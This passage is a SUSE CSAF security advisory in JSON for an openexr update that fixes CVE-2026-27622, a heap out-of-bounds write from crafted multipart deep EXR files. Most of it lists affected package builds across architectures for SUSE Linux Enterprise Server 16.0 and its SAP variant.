| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:openexr-3.2.2-160000.5.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP applications 16.0:openexr-doc-3.2.2-160000.5.1.noarch | — |
Vendor Fix
|
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for openexr",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for openexr fixes the following issue:\n\n- CVE-2026-27622: crafted multipart deep EXR can cause an heap out-of-bound write (bsc#1259177).\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-SLES-16.0-450",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2026_20936-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2026:20936-1",
"url": "https://www.suse.com/support/update/announcement/2026/suse-su-202620936-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2026:20936-1",
"url": "https://lists.suse.com/pipermail/sle-updates/2026-April/045216.html"
},
{
"category": "self",
"summary": "SUSE Bug 1259177",
"url": "https://bugzilla.suse.com/1259177"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2026-27622 page",
"url": "https://www.suse.com/security/cve/CVE-2026-27622/"
}
],
"title": "Security update for openexr",
"tracking": {
"current_release_date": "2026-03-26T10:00:01Z",
"generator": {
"date": "2026-03-26T10:00:01Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2026:20936-1",
"initial_release_date": "2026-03-26T10:00:01Z",
"revision_history": [
{
"date": "2026-03-26T10:00:01Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libIex-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"product": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"product_id": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64"
}
},
{
"category": "product_version",
"name": "openexr-3.2.2-160000.5.1.aarch64",
"product": {
"name": "openexr-3.2.2-160000.5.1.aarch64",
"product_id": "openexr-3.2.2-160000.5.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "openexr-doc-3.2.2-160000.5.1.noarch",
"product": {
"name": "openexr-doc-3.2.2-160000.5.1.noarch",
"product_id": "openexr-doc-3.2.2-160000.5.1.noarch"
}
}
],
"category": "architecture",
"name": "noarch"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"product_id": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le"
}
},
{
"category": "product_version",
"name": "openexr-3.2.2-160000.5.1.ppc64le",
"product": {
"name": "openexr-3.2.2-160000.5.1.ppc64le",
"product_id": "openexr-3.2.2-160000.5.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libIex-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"product": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"product_id": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x"
}
},
{
"category": "product_version",
"name": "openexr-3.2.2-160000.5.1.s390x",
"product": {
"name": "openexr-3.2.2-160000.5.1.s390x",
"product_id": "openexr-3.2.2-160000.5.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libIex-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product": {
"name": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"product_id": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
}
},
{
"category": "product_version",
"name": "openexr-3.2.2-160000.5.1.x86_64",
"product": {
"name": "openexr-3.2.2-160000.5.1.x86_64",
"product_id": "openexr-3.2.2-160000.5.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server 16.0",
"product": {
"name": "SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server"
}
}
},
{
"category": "product_name",
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product": {
"name": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sles:16:16.0:server-sap"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXR-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRCore-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libOpenEXRUtil-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.aarch64"
},
"product_reference": "openexr-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "openexr-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.s390x"
},
"product_reference": "openexr-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:openexr-3.2.2-160000.5.1.x86_64"
},
"product_reference": "openexr-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "openexr-doc-3.2.2-160000.5.1.noarch as component of SUSE Linux Enterprise Server 16.0",
"product_id": "SUSE Linux Enterprise Server 16.0:openexr-doc-3.2.2-160000.5.1.noarch"
},
"product_reference": "openexr-doc-3.2.2-160000.5.1.noarch",
"relates_to_product_reference": "SUSE Linux Enterprise Server 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIex-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIex-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.ppc64le",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.s390x"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIlmThread-3_2-31-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64"
},
"product_reference": "libIlmThread-3_2-31-x86-64-v3-3.2.2-160000.5.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64 as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Server for SAP applications 16.0"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le as component of SUSE Linux Enterprise Server for SAP applications 16.0",
"product_id": "SUSE Linux Enterprise Server for SAP applications 16.0:libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le"
},
"product_reference": "libOpenEXR-3_2-31-3.2.2-160000.5.1.ppc64le",
